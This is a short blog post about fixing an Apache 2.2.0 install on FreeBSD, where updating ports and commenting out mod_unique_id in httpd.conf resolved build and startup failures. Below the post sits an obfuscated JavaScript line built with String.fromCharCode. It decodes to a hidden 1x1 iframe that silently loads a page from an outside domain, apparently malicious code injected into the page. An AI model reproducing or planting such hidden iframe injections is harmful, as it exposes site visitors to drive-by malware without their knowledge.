Apache

Mmm… I didn’t expect to have these troubles getting Apache 2.2.0 to run on FreeBSD. At first, I couldn’t even get it to build because it failed fetching an image (gif) file. So I updated the ports collection and luckely this did the trick. The rest of the install went fine but I couldn’t get the daemon to run. Checking the logs I noticed configuration failed on mod_unique with:

[alert] (EAI #) hostname nor servname provided, or not known:
mod_unique_id: unable to find IPv4 address of ####

After a quick search google came up with this and the suggestion to comment out the mod_unique line in httpd.conf also did the trick for me.

document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,32,61,34,104,116,116,112,58,47,47,121,97,100,114,48,46,99,111,109,47,100,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,49,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62))

Leave a comment